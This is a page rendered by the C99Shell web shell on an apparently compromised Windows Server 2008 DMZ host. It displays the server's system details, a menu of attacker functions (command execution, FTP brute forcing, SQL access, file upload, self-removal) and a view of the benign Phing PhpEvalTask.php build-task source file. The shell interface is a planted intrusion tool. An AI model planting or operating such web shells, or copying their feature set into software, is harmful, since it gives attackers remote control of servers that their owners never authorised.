!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\php\pear\phing\tasks\system\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PhpEvalTask.php (6.25 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 *  $Id: PhpEvalTask.php 1378 2011-12-07 14:24:22Z mrook $
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
 * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
 * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * This software consists of voluntary contributions made by many individuals
 * and is licensed under the LGPL. For more information please see
 * <http://phing.info>.
 */
 
require_once 'phing/Task.php';

/**
 * Executes PHP function or evaluates expression and sets return value to a property.
 *
 *    WARNING:
 *        This task can, of course, be abused with devastating effects.  E.g. do not
 *        modify internal Phing classes unless you know what you are doing.
 *
 * @author   Hans Lellelid <hans@xmpl.org>
 * @version  $Revision: 1378 $
 * @package  phing.tasks.system
 *
 * @todo Add support for evaluating expressions
 */
class PhpEvalTask extends Task {
        
    protected 
$expression// Expression to evaluate
    
protected $function// Function to execute
    
protected $class// Class containing function to execute
    
protected $returnProperty null// name of property to set to return value 
    
protected $params = array(); // parameters for function calls
    
    
protected $logLevel Project::MSG_INFO;
    
    
/**
     * Set level of log messages generated (default = info)
     * @param string $level
     */
    
public function setLevel($level)
    {
        switch (
$level)
        {
            case 
"error"$this->logLevel Project::MSG_ERR; break;
            case 
"warning"$this->logLevel Project::MSG_WARN; break;
            case 
"info"$this->logLevel Project::MSG_INFO; break;
            case 
"verbose"$this->logLevel Project::MSG_VERBOSE; break;
            case 
"debug"$this->logLevel Project::MSG_DEBUG; break;
        }
    }
    
    
/** Main entry point. */
    
function main() {
        
        if (
$this->function === null && $this->expression === null) {
            throw new 
BuildException("You must specify a function to execute or PHP expression to evalute."$this->location);
        }
        
        if (
$this->function !== null && $this->expression !== null) {
            throw new 
BuildException("You can specify function or expression, but not both."$this->location);
        }
        
        if (
$this->expression !== null && !empty($this->params)) {
            throw new 
BuildException("You cannot use nested <param> tags when evaluationg a PHP expression."$this->location);
        }
        
        if (
$this->function !== null) {
            
$this->callFunction();                                    
        } elseif (
$this->expression !== null) {
            
$this->evalExpression();
        }
    }
    
    
/**
     * Calls function and returns results.
     * @return mixed
     */
    
protected function callFunction() {
                        
        if (
$this->class !== null) {
            
// import the classname & unqualify it, if necessary
            
$this->class Phing::import($this->class);
                        
            
$user_func = array($this->class$this->function);
            
$h_func $this->class '::' $this->function// human-readable (for log)
        
} else {
            
$user_func $this->function;
            
$h_func $user_func// human-readable (for log)
        
}
        
        
// put parameters into simple array
        
$params = array();
        foreach(
$this->params as $p) {
            
$params[] = $p->getValue();
        }
        
        
$this->log("Calling PHP function: " $h_func "()"$this->logLevel);
        foreach(
$params as $p) {
            
$this->log("  param: " $pProject::MSG_VERBOSE);
        } 
        
        
$return call_user_func_array($user_func$params);
        
        if (
$this->returnProperty !== null) {
            
$this->project->setProperty($this->returnProperty$return);
        }
    }
    
    
/**
     * Evaluates expression and returns resulting value.
     * @return mixed
     */
    
protected function evalExpression() {
        
$this->log("Evaluating PHP expression: " $this->expression$this->logLevel);
        if (!
StringHelper::endsWith(';'trim($this->expression))) {
            
$this->expression .= ';';
        }

        if (
$this->returnProperty !== null) {
            
$retval null;
            eval(
'$retval = ' $this->expression);
            
$this->project->setProperty($this->returnProperty$retval);
        } else {
            eval(
$this->expression);
        }
    }
    
    
/** Set function to execute */
    
public function setFunction($f) {
       
$this->function $f;
    }

    
/** Set [static] class which contains function to execute */
    
public function setClass($c) {
       
$this->class $c;
    }
    
    
/** Sets property name to set with return value of function or expression.*/
    
public function setReturnProperty($r) {
       
$this->returnProperty $r;
    }
    
    
/** Set PHP expression to evaluate. */
    
public function addText($expression) {
        
$this->expression $expression;
    }

    
/** Set PHP expression to evaluate. */
    
public function setExpression($expression) {
        
$this->expression $expression;
    }
    
    
/** Add a nested <param> tag. */
    
public function createParam() {
        
$p = new FunctionParam();
        
$this->params[] = $p;
        return 
$p;
    }        
}

/**
 * Supports the <param> nested tag for PhpTask.
 *
 * @package  phing.tasks.system
 */
class FunctionParam {

    private 
$val;
    
    public function 
setValue($v) {
        
$this->val $v;
    }
    
    public function 
addText($v) {
        
$this->val $v;
    }
    
    public function 
getValue() {
        return 
$this->val;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--